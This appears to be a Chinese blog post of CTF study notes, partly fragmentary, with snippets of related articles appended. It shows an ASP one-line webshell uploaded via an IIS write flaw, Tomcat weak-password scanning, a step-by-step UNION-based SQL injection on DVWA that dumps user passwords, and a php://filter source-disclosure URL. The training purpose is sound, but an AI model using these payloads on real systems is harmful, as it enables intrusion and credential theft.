攻防實戰 CTF大賽準備(手動注入sql)

2022-08-03 01:57:15 字數 1441 閱讀 7865

一、iis write漏洞利用

先用工具掃瞄,再上傳小馬,使用菜刀連線即可。

思考點:

如何獲知是一台iis站點?

本例中上傳的一句話木馬是什麼意思?

<%eval request("mh")%>

二、tomcat伺服器漏洞利用

先用nmap掃瞄埠開放資訊。

然後利用metasploit或者apache tomcat.exe工具裡面的掃瞄辦法來掃瞄弱口令。

需要注意的是,對於管理員賬號的猜測,可以猜測admin、root、administrator等。

三、sql 手工注入(以dvwa為例)(參考

1、判斷字段總數:

admin,password登入dvwa後,將安全級別調至低。進入sql injection介面。

輸入1』 報錯。確認有注入漏洞。

輸入1' order by 2#正常返回結果。輸入1' order by 3# 報錯。表明資料庫只有兩列。order by 後面跟的應該是第幾列的列數。這樣看來資料庫表只有兩列。結尾的#號用於截斷sql語句,以免報錯。也可以換做-- -

2、判斷顯示位

1' union select 1,2# 可以看到1,2分別顯示在first name和sur name處。

3、顯當前示資料庫和版本資訊。

1' union select database(),version()#

4、顯示所有資料庫的名稱

1' union select schema_name,1 frominformation_schema.schemata#

5、顯示當前資料庫表名

1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

可以看到當前資料庫表名:guestbook,users

6、查詢列名:

1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#

7、查詢資料值

1' union select group_concat(user,password),3 from users#

其中user和password是上一步得出的結果。

也可以寫作

1' union select user,password from users#

四、php

1、strcmp漏洞

1、http post工具:

2、解碼加密工具:

十、ctf大賽本身學習

1、鵬越ctf學霸專區

2、3、強網杯

4、xctf(南京賽寧)

CTF系列 攻防世界 nizhuansiwei

相關資訊 hint 無 進入 後,便能顯示原始碼,是一道 審計題目。text get text file get file password get password text 需要等於 welcomeif isset text file get contents text r welcome to...

Webmail攻防實戰

webmail是指利用瀏覽器通過web方式來收發電子郵件的服務或技術,不需借助郵件客戶端,可以說只要能上網就能使用webmail,極大地方便了使用者對郵件的收發。對於不能熟練使用郵件客戶端,或者在網咖不便使用郵件客戶端的使用者來說,webmail更是必不可少的選擇。email能夠成為當今intern...

CTF後門入侵系統 攻防世界

php filter是php中特有協議流,中間流 來處理其他流,就比如可以用 post請求通過base64將php原始碼編譯並輸出 localhost 80 index.php?php filter write convert.base64 decode resource index.php 輸出的...